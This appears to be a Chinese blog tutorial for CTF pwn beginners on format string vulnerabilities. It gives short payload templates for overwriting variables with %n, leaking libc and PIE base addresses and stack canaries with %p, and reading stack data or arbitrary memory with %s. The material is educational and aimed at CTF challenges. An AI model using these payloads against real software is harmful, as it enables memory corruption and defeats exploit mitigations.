写在前面:
格式化字符串漏洞由于目前编译器的默认禁止敏感格式控制符,而且容易通过代码审计中发现,所以此类漏洞现在已经极少出现了。
所以格式化字符串漏洞在实际利用过程中现在几乎挖掘不到了,但是在CTF的pwn题中,由于其可以结合其他溢出漏洞利用,还是经常会遇到格式化字符串漏洞的。
格式化字符串漏洞最早被Tymm Twillman在1999年发现,当时并未引起重视。在tf8的一份针对wu-ftpd格式化字符串漏洞实现任意代码执行的漏洞的报告之后(详情可参阅 《黑客攻防技术宝典-系统实战篇》),才让人们意识到它的危害,至此而发现了大量的相关漏洞。
格式化字符串漏洞的产生根源主要源于对用 户输入未进行过滤,这些输入数据都作为数据传递给某些执行格式化操作的函数,如printf,sprintf,vprintf,vprintf。恶意用户 可以使用"%s","%x",“%p”来得到堆栈的数据,甚至可以通过"%n"来对任意地址进行读写,导致任意代码读写。
一般掌握好“%n”和“%p”的利用就差不多了
作用一:
可以改写一个变量的值的大小,比如改写变量x的大小为任意你想要的值
小范围修改:
这里正常来说条件是不可能成立的,因为程序自己已经设定好了x的值为3,但是我们可以通过格式化字符串的漏洞改写变量x的值为5,使这个If条件成立,跳转到welcome这个漏洞函数里面去
依旧是以32位程序为例子
payload = p32(0x804C030) + b'%1c' + b'%4$n'
通过这个payload就可以改写x的值为5,从而使这个If条件成立,跳转到welcome这个漏洞函数里面去
大范围修改:
这个就需要自己去调试和真正理解这个格式化字符串的原理了,这里给出payload
payload = "%{}c".format(str(value)).encode() + b"%n$n"
payload=(b'%'+str(one_gadget>>padding&0xffff).encode()+b'c%n$hn').ljust(padding,b'\x00')
记得加上地址。
其实啊,这个也可以一键修改好你想要的值
就是pwntools小工具里面有这个写好的函数原型可以直接用,填入偏移,数据和地址就可以直接修改好,不过刚开始还是自己理解原理为最好,不要太依赖这个。
作用二:
泄露函数实际的地址
其实格式化字符串漏洞也可以泄露出来函数实际地址,然后根据固定公式,就可以计算出来Libc的基地址,这也是我最近才学习到的新方法,常规的泄露libc基地址的方法可以见我上一篇博客:ret2libc 泄露libc后构造system(‘/bin/sh‘)进行攻击(pwn入门)-CSDN博客
脚本如下:
payload = '.%n$p'
p.sendline(payload)
p.recvuntil('.')
leak = int(p.recv(10),16) - padding
作用三:
泄露pie基地址从而绕过pie保护机制
脚本如下:
payload = '.%n$p'
p.recvuntil('.')
pie_base = int(p.recv(14),16) - padding - base
作用四:
泄露canary从而绕过canary保护机制
脚本如下:
payload = 'aaaa%n$p'
p.sendline(payload)
p.recvuntil('aaaa')
canary = int(p.recvuntil('00'),16)
log.success('canary:' + hex(canary))
作用五:
直接泄露出栈上的数据,如果一些重要的信息比如flag直接放在栈上,那可以直接利用下面payload泄露出来
payload = '%n$s'
作用六:
写地址进栈,来实现读任意地址内存
依旧是32位为例子
payload = <address>%<order>$s
这样就可以尝试读出,adress处对应的值,但是往往不会达到预期的目的,后来查了资料才知道
因为是%s,其遇到\x00就会直接断了,没有想要的输出。更常有的情况就是,会输出一大堆,然后我们想要的地址掺杂在里面,所以可以改进一下,可以加一组标记,然后再去取出来想要,这样也可以来检测是否被\x00截断了。
改进:
payload = <address>@@%<order>$s@@
在使用的时候记得除去 < >。
64位的话就是地址放在后面
作用七(刚开始觉得这个不算Pwn入门所以没说):劫持fini_array|劫持got表
可以去看下我朋友写的博客,蛮详细的我就不多说了
【PWN · 格式化字符串|劫持fini_array|劫持got表】[CISCN 2019西南]PWN1-CSDN博客
写在最后:
这些就是很基础很基础的入门的运用了,其实真正的比赛往往考察的都是非栈上的格式化字符串漏洞,变量在.bss段或者别的地方,就得利用"四马分肥"和"诸葛连弩"这种精细的攻击手法,一点一点的去修改,还在学习ing......